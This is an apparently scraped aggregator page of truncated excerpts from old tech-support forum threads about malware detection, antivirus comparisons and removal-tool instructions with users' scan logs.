Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a description of your problem, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.comDDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the results, click no to the Optional_ScanFollow the ... Read more

2 more replies
Relevance 81.18%

Hey all,

I am interested in finding out how you guys configure (harden) your home and/or corporate systems for malware prevention/detection. Specifically for spyware, browser hijacks, etc.

Obviously, you would set in place an anti-virus application and malware detection application like SpyBot. However, what would be a few procedures to take it a step higher? Modify the hosts file, configure automation in SpyBot, etc?

Thanks!
-Cedric
 

Answer:Malware Preventionc & Detection

don't click on stuff that promises "improved results'". use firefox. have 56k
 

5 more replies
Relevance 81.18%

Hello,

We have run your software ComboFix in our Web site folder.

The log file hence created has been attached with this email.

If you can help us with your views in regard to our test,that would be great.

We look forward to your feedback.

Answer:Web Site Malware Detection

Hello and welcome to Bleeping Computer! I am HelpBot: an automated program designed to help the Bleeping Computer Staff better assist you! We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here. To help Bleeping Computer better assist you please perform the following steps:***************************************************First, I need to know if you still need help! To tell me this, please click on http://www.bleepingcomputer.com/logreply/408907 and follow the instructions there. If you do not still need help, this is all you need to do. If you do need help please continue below.***************************************************If you still need help, I would like you to post a Reply to this topic (click the "Add Reply" button in the lower right hand of this page). In that reply, please include the following information:If you have not done so already, include a clear description of the problems you're having, along with any steps you may have performed so far.A new DDS and GMER log. For your convenience, you will find the instructions for generating these logs repeated at the bottom of this post.
Please do this even if you have p... Read more

2 more replies
Relevance 80.36%

Currently i have used malwarebytes due to its ability to install and run in safemode and have loved it.

But i here that some things can get past some av.

any way i was wondering if there was a chart showing all the detection rates of different FREE av's

My system is malwarebytes, spybot s&d Edit: i also chose them as they do not conflict with other av"s

I was also interested in bootable av's i heard that they exist. What are some free ones of those that i may research on.

Thanks.

Answer:Research on FREE virus scanners (Detection rates and other fun stuff)

AV-Comparatives - Independent Tests of Anti-Virus Software - Welcome to AV-Comparatives.org

they don't just test free software, but include commercial stuff too.

9 more replies
Relevance 80.36%

Hi, I was a big fan of Avira free antivirus, but since version 15.0.17 (I think) it is no possible to choose interactive action on detection for the Real -Time protection module. It always send the detected file to quarantine.

Anybody knows how to restore the old behavior?
 

More replies
Relevance 80.36%

On their site it is written that only one on-demand scan will be performed.Does that mean if I run the online scanner on my pc for once and clean detected items,I will not be able to use it in future?There is also a 30day unlimited trial offer is given.Not sure if this is about their private wifi or online scanner.Seeking some advice and feeling terrified.

Answer:ESET online scanner provides only one time free detection and cleaning?

What web page did you see that information?The main scanner page and FAQs do not say it can only be used one time.http://www.eset.com/int/home/products/online-scanner/http://www.eset.com/int/home/products/online-scanner/faq/After every scan, you have the option to uninstall the ESET Online Scanner with all its components or leave them for future scanning.

8 more replies
Relevance 79.95%

Just saying hi to everyone. I use Bleeping Computer with a lot of my malware issues. I'm tech support for a large office, and believe me, with people get infected all the darn time. Mcafee and even the new Norton, is not enough for protection. I'm curious to see if there is such a product on the market that will stop say 98% of all intrusions. I'll be looking over the forums to see if anyone has found such a thing, and what it cost. Thanks to the guys/gals for having this site, you are appreciated.

Answer:Looking for a the best Malware detection/removal tool

Choosing a security toolkit with anti-virus, firewall and anti-malware programs is a matter of personal preference, your needs, your technical ability and experience, features offered, user friendliness, ease of updating (and upgrading to new program release), ease of installation/removal, available technical support from the vendor and price. Other factors to consider include detection rates and methods, scanning engine effectiveness, how often virus definitions are updated, the amount of resources the program utilizes, how it may affect system performance and what will work best for your system. A particular anti-virus that works well for one person may not work as well for another. You may need to experiment and find the one most suitable for your use and your system. There is no universal "one size fits all" solution that works for everyone and there is no best anti-virus. For more specific information to consider, please read Choosing Your Anti-virus Software and How to choose a firewall.No single product is 100% foolproof and can prevent, detect and remove all threats at any given time. Just because one anti-virus detected threats that another missed, does not mean its more effective. The security community is in a constant state of change as new infections appear and it takes time for them to be reported, samples collected, analyzed, and tested by anti-vendors. Security vendors use different scanning engines and different detection methods such as heuristic a... Read more

1 more replies
Relevance 79.95%

Today Bing Webmaster alerted me to URLs infected with malware on a website I manage with the references as 
 
URL TYPE ADDITIONAL DETAILS LAST SCANNED LAST DETECTED http://lightpixiestudio.com/giant-arrows-across-america Malware reference found on the page Malware Network Reference 3/30/2015 3/30/2015 http://lightpixiestudio.com/car-crazy-for-carhenge Malware reference found on the page Malware Network Reference 3/24/2015 3/24/2015 http://lightpixiestudio.com/grand-teton Malware reference found on the page Malware Network Reference 3/21/2015 3/21/2015 http://lightpixiestudio.com/fairchild-tropical-botanic-garden-miami-florida Malware reference found on the page Malware Network Reference 3/21/2015 3/21/2015 http://lightpixiestudio.com/star-valley-afton-wyoming Malware reference found on the page Malware Network Reference 3/21/2015 3/21/2015
 
 
and the Malware Network Reference as: "Reference to known malware distribution network detected. This could be via inclusion of an iframe or frame tag, an embedded object, or a script tag."
 
I found a similar topic here from last summer with a successful outcome, but as it's many months old, I'm reluctant to blindly follow those instructions. Also it's unclear to me how adware and malware maintenance on my desktop fixes anything on a WP website served by GoDaddy. FYI: I constantly scan my computer with Windows Security Essentials, Malwarebytes Anti-Malware Premium, and CCleaner Professional. The website has the... Read more

More replies
Relevance 79.95%

I haven't found any malware before, now on average McAfee finds avg. 18.
Would you please ready my scriptfraud and HJT? Thank you so much.

SmitFraudFix v2.300
Scan done at 15:33:57.14, Tue 03/04/2008
Run from C:\Documents and Settings\Owner\Desktop\SmitfraudFix
OS: Microsoft Windows XP [Version 5.1.2600] - Windows_NT
The filesystem type is NTFS
Fix run in normal mode

»»»»»»»»»»»»»»»»»»»»»»»» Process

C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Windows Defender\MsMpEng.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Windows Defender\MSASCui.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\DOCUME~1\Owner\MYDOCU~1\COMCAS~1\data\xtras\mssysmgr.exe
C:\Program Files\Dell Support Center\bin\sprtcmd.exe
C:\WINDOWS\system32\dllhost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\McAfee\HackerWatch\HWAPI.exe
C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
c:\PROGRA~1\COMMON~1\mcafee\mna\mcnasvc.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcods.exe
C:\PROGRA~1\McAfee\MSC\mcpromgr.exe
c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe
c:\PROGRA~1\COMMON~1\mcafee\redirsvc\redirsvc.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
c:\PROGRA~1\mcafee.com\agent\mcagent.exe
C:\Program Files\McAfee\MPF\MPFSrv.exe
C:\PROGR... Read more

Answer:Solved: sudden malware detection avg. 27

9 more replies
Relevance 79.95%

Malware Detection Techniques
Signature Based or Pattern Matching or String or Mask or Fingerprinting Technique

A signature is an algorithm or hash (a number derived from a string of text) that uniquely identifies a specific virus. Depending
on the type of scanner being used, it may be a static hash which, in its simplest form, is a calculated numerical value of a snippet
of code unique to the virus. Or, less commonly, the algorithm may be behavior-based. A single signature may be consistent
among a large number of viruses. A virus signature is the viral code. To identify viruses and other malware, antivirus software
compares the contents of a file to a dictionary of virus signatures.

Heuristic Analysis or Pro-Active Defense

Heuristic scanning is similar to signature scanning, except that instead of looking for specific signatures, heuristic scanning
looks for certain instructions or commands within a program that are not found in typical application programs. As a result, a
heuristic engine is able to detect potentially malicious functionality in new, previously unexamined, malicious functionality such
as the replication mechanism of a virus, the distribution routine of a worm or the payload of a Trojan.

Here are a few of the common heuristic scanning techniques:

File Emulation or Sandbox or Dynamic:

Also known as ?sandbox testing? or dynamic scanning, file emulation allows the file to run in a controlled virtual system (or
?sandbox?) to see what it does. If t... Read more

More replies
Relevance 79.95%

I have removed many things from my computer, but I can't seem to get it all cleaned out. I can't get microsoft updates and it seems to be blocking many spyware detection programs. I have tried everything and the problems just won't end. I have found both Drive Defender and WIN Antispy as well as Adware. I think Adware is the one that keeps coming back, but there seems to be so much more. Also had mustafx.

Here's my Deckard's log and attachment:



-- Device Manager: Disabled ----------------------------------------------------

No disabled devices found.


-- Scheduled Tasks -------------------------------------------------------------

2008-01-25 13:54:49 330 --ah----- C:\WINDOWS\Tasks\MP Scheduled Scan.job
2008-01-15 01:39:23 364 --a------ C:\WINDOWS\Tasks\McDefragTask.job
2008-01-01 01:00:00 366 --a------ C:\WINDOWS\Tasks\McQcTask.job


-- Files created between 2007-12-25 and 2008-01-25 -----------------------------

2008-01-25 15:33:09 0 d-------- C:\WINDOWS\LastGood
2008-01-25 15:24:24 0 d-------- C:\Program Files\SpywareBlaster
2008-01-25 11:35:44 0 d-------- C:\VundoFix Backups
2008-01-25 11:10:51 0 d-------- C:\Documents and Settings\LocalService\Application Data\Google
2008-01-24 09:11:18 0 d-------- C:\WINDOWS\MaxSecureBackup
2008-01-24 09:08:05 0 d-------- C:\WINDOWS\system32\%sZstemroot%
2008-01-23 19:28:18 0 d-------- C:\Documents and Settings\LocalService\Start M... Read more

Answer:spyware detection malware problems-BAD

Hi westcoastkevin and welcome to TSF

From Control Panel > Security Centre Under 'Manage Security Settings for' click Automatic Updates
Place a check next to Turn off Automatic Updates and click Apply to turn updates off.
Now place a check next to Automatic (Recommended) and click Apply to switch them back on
Exit Security Centre
Reboot
Are you able to install updates now?

---------------------------------
Download Combofix from any of the links below, and save it to your desktop.

Link 1
Link 2
Link 3


**Note: It is important that it is saved directly to your desktop**

--------------------------------------------------------------------

1. Close any open browsers.

2. Close/disable all anti virus and anti malware programs so they do not interfere with the running of ComboFix.

If your not sure how to disable them then double-check against the list found >>>HERE<<< This list is not all inclusive, if your programs are not listed and you are unsure then please ask before continuing.

--------------------------------------------------------------------

Double click on combofix.exe & follow the prompts.When finished, it will produce a report for you.
Please post the "C:\ComboFix.txt"
Note:
Do not mouseclick combofix's window while it's running. That may cause it to stall

-------------------------------------... Read more

19 more replies
Relevance 79.95%

The message "Malware Detected: Block or Allow" appeared right in the exact same spot where I routinely see my anti-virus asking me to buy stuff where "Allow" is where the "No" button normally is. I immediately ran a virus scan which detected a Trojan (generic kind; no specific name). It was then supposedly removed but...my PC is now acting kind of funny. Windows won't create Restore Points, manual or otherwise, the graphics tend to stutter and I'm routinely told my graphics driver is out of date (it's not), and I occasionally see file transfer graphics popping up in the corner of the screen.
Anyway, something feels off. I've ran multiple virus scans (Avira, MalwareBytes, SuperAntiSpyware, Rogue Killer) but they haven't found anything. I know some malware only needs a few seconds upon clicking that "allow" button to cause all sorts of chaos. I just want to be sure.
DDS:
DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.17126
Run by david at 20:53:35 on 2014-06-22
Microsoft Windows 7 Professional 6.1.7601.1.1252.1.1033.18.4094.3081 [GMT -4:00]
.
AV: Avira Desktop *Enabled/Updated* {4D041356-F94D-285F-8768-AAE50FA36859}
SP: Avira Desktop *Enabled/Updated* {F665F2B2-DF77-27D1-BDD8-9197742422E4}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\aties... Read more

Answer:Accidentally Clicked "Allow" on Malware Detection

Hello, Welcome to BleepingComputer.I'm nasdaq and will be helping you.If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.===Please download AdwCleaner by Xplode onto your Desktop.Close all open programs and internet browsers.Double click on AdwCleaner.exe to run the tool.Click the Scan button and wait for the process to complete.Click the Report button and the report will open in Notepad.IMPORTANTIf you click the Clean button all items listed in the report will be removed.If you find some false positive items or programs that you wish to keep, Close the AdwCleaner windows.Close all open programs and internet browsers.Double click on AdwCleaner.exe to run the tool.Click the Scan button and wait for the process to complete.Check off the element(s) you wish to keep.Click on the Clean button follow the prompts.A log file will automatically open after the scan has finished.Please post the content of that log file with your next answer.You can find the log file at C:\AdwCleaner[Sn].txt (n is a number).===Download the correct version of this tool for your operating system.Farbar Recovery Scan Tool (64 bit)Farbar Recovery Scan Tool (32 bit)and save it to a folder on your computer's Desktop.Double-click to run it. When the tool opens click Yes to disclaimer.Press Scan button.It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.The... Read more

15 more replies
Relevance 79.95%

Hi Guys,

I am looking to create a (hopefully highly customizable) VM to infect with malware so I can test a few malware detection scripts etc.

My original plan was to download the ISO myself from the source website (i.e. Get Ubuntu | Download | Ubuntu) and go from there, but I was wondering if people could recommend a security specific / aimed resource that might have a Unix build (preferably Ubuntu) ISO that was fairly bare bones, but would also be malware free.

If using the source ISO that is my best option, any advice on setting up / creating the VM so to minimise the chance of malware escaping? I plan on running everything inside a sandbox (cuckoo), and I've seen a few threads on here already mentioning disabling virtualisation etc, but any extra info is always welcome.

Thanks guys,
Kroack.
 

More replies
Relevance 79.95%

Hello, this has been posted already, but perhaps the treatment method may vary depending on my situation and logs etc, so reposting...

XP SP3
IE 8 BETA (although using Firefox mainly)
Tried: Fullscan with KIS 2009 (kaspersky) and Adaware.
It removed some win32trojan downloader agent mkav or so, but problem remains.

Description:
I've been experiencing multiple iexplore.exe processes running freely without my control (I use Firefox mainly). While they run, there's a weird chinese speech in the background which sounds like a commercial, it may repeat itself few times and even overrun itself in sound.

The Problem:
iexplore.exe keeps on running along with the CHINESE talking in the background.

Now, if I run full scan on my system with KIS, it wouldn't detect anything, not to mention updated Lavasoft Ad-Aware 2008...

DDS LOG:

DDS (Version 1.0) - NTFSx86
Run by Idan at 22:27:53.26 on Mon 12/08/2008
Microsoft Windows XP Professional 5.1.2600.3.1255.972.1033.18.2046.1606 [GMT 2:00]

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\system32\svchost.exe -k netsvcs
svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\GIGABYTE\EnergySaver\GSvr.exe
C:\WINDOWS\System32\svchost.exe -k HPZ12
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\System32\svchost.exe -k HPZ12
C:\WINDOWS\system32\svchost.exe -k imgsvc
C:\WINDOWS\Explorer.EXE
C:\WIN... Read more

Answer:iexplore.exe malware detection and removal ?

Hello and welcome to TSF

Please do NOT start multiple threads on the same problem.

Here is what it says in the forum rules:


Quote:




MULTIPLE POSTING

This refers to posting the same question or same replies in multiple areas of the site (also called flooding). Please only post only once. If you feel you have posted in the wrong forum, contact a Moderator or Manager, who will move the post for you. This also includes the creation of multiple new threads on the same or similar topics and sending PM's continuously to one or more Staff members.




Click here for the rules

This thread is Closed

1 more replies
Relevance 79.95%

HI - i detected a few malware with NAV and Kaspersky and was about to use OT MOVE IT but recall stern instructions to not use the tools i was given on this site without supervision. Please advise on how to remove the following malware --see logs below. So far I am not really getting any problems except some wierd graphics disruptions while using Itunes....but that might be a lack of system resources....? Please advise
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 9:10:38 AM, on 4/7/2009
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.5730.0011)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\DTS.exe
C:\WINDOWS\system32\ibmpmsvc.exe
C:\WINDOWS\system32\AtService.exe
C:\WINDOWS\system32\FpLogonServ.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\ThinkPad\Bluetooth Software\bin\btwdins.exe
C:\Program Files\Intel\WiFi\bin\S24EvMon.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\EPSON\eEBAPI\eEBSVC.exe
C:\Program Files\Common Files\ArcSoft\Connection Service\Bin\ACService.exe
C:\Program Files\ThinkPad\ConnectUtilities\AcPrfMgrSvc.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobile... Read more

More replies
Relevance 79.95%

Sana plans stand-alone antivirus product News Story by Robert McMillanSEPTEMBER 20, 2005Most antivirus products identify malicious software by comparing the software being run to pieces of known worm and virus code, called signatures. Primary Response, however, determines whether software is malicious based on a mathematical analysis of what it's trying to do.This means that, unlike other products, Primary Response can protect users even from unreported viruses,...computerworld.com/securitytopics

More replies
Relevance 79.95%

Usually trojans were found in System Volume Information Files. Everytime after Threat Scanning by Malwarebytes Anti-Malware, action was applied and removal of such files via System Reboot. Thereafter, through similar scanning of Malwarebytes Anti-Malware again, same detection is found again with similar files which means that those troajns cannot be actually removed.
Please check and advise what remedy actions I have to undertake in order to avoid such similar re-occurrence of infection to my Registry Files. Required scan files are attached for your reference and checking.
Many thanks for your kind assistance!
 

Answer:Malware Detection On System Registry

Please download zoek.zip or zoek.rar by smeenk () from here or here and save it to your Desktop.
Unpack the archive...

Close any open browsers
Temporarily disable your AntiVirus program. (If necessary)
If you are unsure how to do this please read this or this Instruction.

Double click on zoek.exe to run the tool .
Please wait while the tool does not start...

Copy the text present inside the code box below and paste it into the large window in the zoek tool:
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to the operating system

Code:
createsrpoint;
gpt.ini;z
C:\Windows\System32\GroupPolicy;v
C:\Windows\SysWOW64\GroupPolicy;v
StandardSearch;
emptyfolderscheck;
installer-list;
installedprogs;
uninstall-list;

Click on button.
Please wait until a logreport will open (this can be after reboot)

Save notepad to your Desktop and attach here zoek-results.log
Note: It will also create a log in the C:\ directory named "zoek-results.log"

 

48 more replies
Relevance 79.95%

Microsoft has several malware detection products such as Windows Defender and Windows Software Removal Tool.
Does Apple any comparable products that it produces for its platforms?

Thanks.

Answer:Malware detection products from Apple?

No, as far as I know, Apple does not produce anti-virus products.

But there are several AV vendors that offer products for many platforms, also OSX.

1 more replies
Relevance 79.95%

As stated in the title. Need a new one
 

More replies
Relevance 79.95%

Malware Detection TechniquesSignature Based or Pattern Matching or String or Mask or Fingerprinting TechniqueA signature is an algorithm or hash (a number derived from a string of text) that uniquely identifies a specific virus. Depending on the type of scanner being used, it may be a static hash which, in its simplest form, is a calculated numerical value of a snippet of code unique to the virus. Or, less commonly, the algorithm may be behavior-based. A single signature may be consistent among a large number of viruses. A virus signature is the viral code. To identify viruses and other malware, antivirus software compares the contents of a file to a dictionary of virus signatures.Heuristic Analysis or Pro-Active DefenseRest of content can be seen here: http://forum.kaspersky.com/index.php?showtopic=234997&view=findpost&p=1845013Topic edited to conform to fair use laws and avoid copyright infringement. ~ Animal

Answer:Malware/Virus Detection Techniques

There are other malware checks which are not discussed in public to safeguard the program from malware writers who would use that information for nefarious purposes.

1 more replies
Relevance 79.54%

thanks in advance
I am looking for things like netwitness and etc but free thanks
 

Answer:school me on free network analysis security detection tools/ softwares

http://securityonion.blogspot.com/
 

5 more replies
Relevance 79.13%

Good evening, I recently watched again this Norton security 2015 review, and I'd like to ask why Norton is so good at web prevention but it hasn't a good detection ratio on the malware pack.

Source of review: ThePCSecurityChannel
-https://www.youtube.com/watch?v=Pyqq2xURHJk
 

Answer:Norton bad detection ratio on malware pack

come on friend you are on MT ,now stop bothering about this type of so called test
 

4 more replies
Relevance 79.13%

April 9, 2011
I use Trend Micro Titanium; pleased with this.
However, I need to know if this package is the best or the worst for detecting malware? Doing the reading of trying to find a simple answer ... what a headache I get.
Conclusion: try Malwarebytes, then buy this s/w package.
Question: Will this work without any conflict with my Trend Titanium?
Answer is: ( this is why I am turning to you ... your knowledge )
 

Answer:which s/w malware detection is best to use with Trend Micro Titanium?

Welcome to Major Geeks!

Questions about what is the best malware detection program are very difficult to answer. It can be very subjective and change every month as new updates for software occur and it also changes as new malware comes out. In reality there is no best single piece of software you do need a layered approach to protection as discussed in the below How to Protect yourself from malware! And the most important part of protection is still the end user.

However to more directly answer your question, Trend Micro is a reasonable program. Some people have complained of its inability to remove malware, but that complaint can be made of many commercial antivirus and security suites. And at least one last review did not think too much of Trend Micro ( for example: http://www.av-comparatives.org/images/stories/test/summary/summary2010.pdf ) but the review is from last year but it was not great.

Malwarebytes is not an antivirus program and you only get protection with the paid version. Malwarebytes is a very good antimalware program which is a highly recommended tool to add along side your antivirus and firewall programs.
 

1 more replies
Relevance 79.13%

Detection test where Comodo gains first place among some other AV programs.
http://trsec.net/threads/trsec-malware-detection-test-may-2013-free-antivirus-test.3140/
 

Answer:TRSec Malware Detection Test - May 2013

Nikos751 said:

Detection test where Comodo gains first place among some other AV programs.
http://trsec.net/threads/trsec-malware-detection-test-may-2013-free-antivirus-test.3140/Click to expand...


1-Comodo Antivirus - Detected: 588 (Version: 6.1.276867.2813 - Database: 16250)

2-Avast Free 8 - Detected: 575 (Version: 8.0.1489 - Database: 13051301)

3-Avira Free Antivirus 2013 - Detected: 534 (Version: 13.0.0.3640 -Database: 7.11.78.62 )

4-Panda Cloud AV Free 2013 - Detected: 514 (Version: 2.1.1 - Database: 13.05.2013 21.34)

5-AVG Free 2013 - Detected: 501 (Version: 2013.0.3336 - Database: 3162/6321)

6-ZoneAlarm Free Antirus + Firewall - Detected: 478 (Version: 11.0.000.157 - Database: 1112777536)

7-Immunet Protect Plus - Detected: 356 (Version: 3.0.8.9025 - Database: 13.05.2013 22.18)

8-Baidu Antivirus - Detected: 274 (Version: 3.4.1.29117 - Database: 13.05.2013 22.02)Click to expand...

Questionable at best and entertaining at most.
Now do not get me wrong no discredit to the mentioned program.
But Comodo first in detection? thats just LOL.

Let me show you ok?
AV-Test did test 25 Antivirus "home" products on windows 8 32 bit and Comodo CIS ranked 22th place.
Test Jan & Feb 2013 (Click on the drop down arrow to select the list upon protection)

The Corporate User version of this test did not even include Comodo.

Or how about the latest VB-100 Test?
0 Pass, 4 Fail in last 12 tests (8 tests not entered)

And AV-Comparatives is even more shocking as th... Read more

14 more replies
Relevance 79.13%

Hi, thanks for looking
I have a problem with my PC, I don't have any idea how it got here although I think it was installed by a trojan that infected the PC.

My HijackThis logfile is:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 00:24:52, on 04/02/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16574)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\Program Files\IVT Corporation\BlueSoleil\BTNtService.exe
C:\WINDOWS\system32\CTsvcCDA.EXE
C:\WINDOWS\system32\crypserv.exe
C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\PnkBstrA.exe
C:\WINDOWS\system32\PnkBstrB.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\SOUNDMAN.EXE
C:\WINDOWS\system32\carpserv.exe
C:\Program Files\MusicMatch\MusicMatch Jukebox\mmtask.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\Program Files\Java\jre1.6.0_03\bin\jusched.exe
C:\Program Files\Adobe\Photoshop Album Starte... Read more

Answer:Spyware Detection Alert/Malware Crush. Please help, I can't get rid of it!

Welcome to TSG

Download Combofix from any of the links below, and save it to your desktop. For information regarding this download, please visit this webpage: http://www.bleepingcomputer.com/combofix/how-to-use-combofix

Link 1
Link 2
Link 3
**Note: It is important that it is saved directly to your desktop**

--------------------------------------------------------------------

1. Close any open browsers.

2. Close/disable all anti virus and anti malware programs so they do not interfere with the running of ComboFix.

--------------------------------------------------------------------

Double click on combofix.exe & follow the prompts.
When finished, it will produce a report for you.
Please post the "C:\ComboFix.txt" along with a new HijackThis log for further review.
Note:
Do not mouseclick combofix's window while it's running. That may cause it to stall
 

1 more replies
Relevance 79.13%

I started having google redirection problems a couple of days back. I suspected that there was a malware attack and tried running CA virus scan and it said there was a problem with my scanner. I then tried running Malwarebytes Anti-Malware. It scanned for 5 seconds and then disappeared. I tried to restart the scan, but started getting the following message "Windows cannot access the specified device, path, or file. You may not have the appropriate permissions to access". I then tried running Spybot - Search and Destroy, but ended up getting the same message above.
After doing some research online, I came across this forum. As instructed by chaslang, I first read the "READ & RUN ME FIRST. Malware Removal Guide" and downloaded the programs one by one. I tried running SUPERAntiSpyware Free Edition. I have the same issue. It starts scanning for a few seconds and then shuts down. The next time I try to run it, I get the "Windows cannot access the specified device, path, or file. You may not have the appropriate permissions to access".
I presume my computer is severely infected. I would really appreciate it if someone could help me with this
 

Answer:Google Redirection and Malware Detection Problem

Hi and welcome to Major Geeks!

Have you attempted to run SAS and the rest of the Read and Run Me First procedures through Safe Mode with Networking? Let me know if this also does not work for you.






If you run into problems trying to run the READ & RUN ME or any of the scans in normal boot mode, you can run the steps in safe boot mode but make sure you tell us what you did later when you post logs. See the below if you do not know how to boot in safe mode:

Starting your computer in Safe mode

If you have problems downloading on the problem PC, download the tools and the manual updates for SUPERAntiSpyware and Malwarebytes ( links are given in the READ & RUN ME) onto another PC and then burn to a CD. Then copy them to the problem PC. You will have to skip getting updates if (and only if) your internet connection does not work. Yes, you could use a flash drive too, but flash drives are writeable and infections can spread to them.
If you cannot seem to login to an infected user account, try using a different user account (if you have one) in either normal or safe boot mode and running only SUPERAntiSpyware and Malwarebytes while logged into this other user account. Then reboot and see if you can log into the problem user account. If you can then run SUPERAntiSpyware, Malwarebytes, ComboFix and MGtools on the infected account as requested in the instructions.
Click to expand...


 

49 more replies
Relevance 79.13%

I cannot complete an antivirus scan. I've uninstalled and reinstalled AVG with no change. Malwarebytes also won't complete a scan. It stops about half way through and shuts down. I can't reopen the program after that, I get an error message that I don't have the right permissions to access. I've had the same results with several different Antivirus programs and malware removal programs. During one malware scan I watched the files being scanned closely, and shortly before the scan terminated and shut down, I noticed that the files being scanned were called Trojan.Win32 and Vundo. (I think these were the names, I only saw them once and they went be quickly)

The DDS text file and the Attach text file are attached.
GMER shuts down immediately after I click "Scan" and so no log file is attached.
Any help would be great. Thanks!

.
DDS (Ver_2011-06-23.01) - NTFSx86
Internet Explorer: 8.0.6001.18702 BrowserJavaVersion: 1.6.0_26
Run by Joanie at 11:43:27 on 2011-08-02
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.3316.2046 [GMT -5:00]
.
AV: AVG Anti-Virus Free Edition 2011 *Enabled/Updated* {17DDD097-36FF-435F-9E1B-52D74245D6BF}
FW: AVG Firewall *Disabled*
.
============== Running Processes ===============
.
C:\PROGRA~1\AVG\AVG10\avgchsvx.exe
"\\.\globalroot\Device\svchost.exe\svchost.exe"
C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WIND... Read more

Answer:Antivirus & Malware Detection Won't Complete a Scan

Good evening. Take a trip to this webpage for download links and instructions for running Combofix by sUBs: http://www.bleepingcomputer.com/combofix/how-to-use-combofix * When prompted to save Combofix, change the filename BEFORE saving it - any name will do, as long as it has .exe at the end. Please be aware that this tool may require the PC to be rebooted so close any programs you have open before you start. When CF has finished, it will produce a log - C:\ComboFix.txt - copy and paste Let me know how the PC is behaving.* There are two points to note from the instructions page:1) The Recovery Console.It is recommended that you install this as, in certain circumstances, it may be the difference between a successful repair and a reformat. If you are uncertain as to whether or not you already have the Recovery Console installed, simply run CF and it will prompt you if it does not detect it.CF will complete some, but not all, of it's removal tasks without the installation of the Console, so you are free to choose whether you want to complete this step, but it is in your interests to do so.2) Disabling your Anti-Virus.CF has been the victim of false-positive detections on occasion and a resident AV may incorrectly identify and delete part of the tool which won't do it much good. If you don't disable your AV, you may not get the results you hoped for!

29 more replies
Relevance 79.13%

So, we got our new computer. I am trying to download the same software that I had on the old one, specifically Free mp3 joiner.
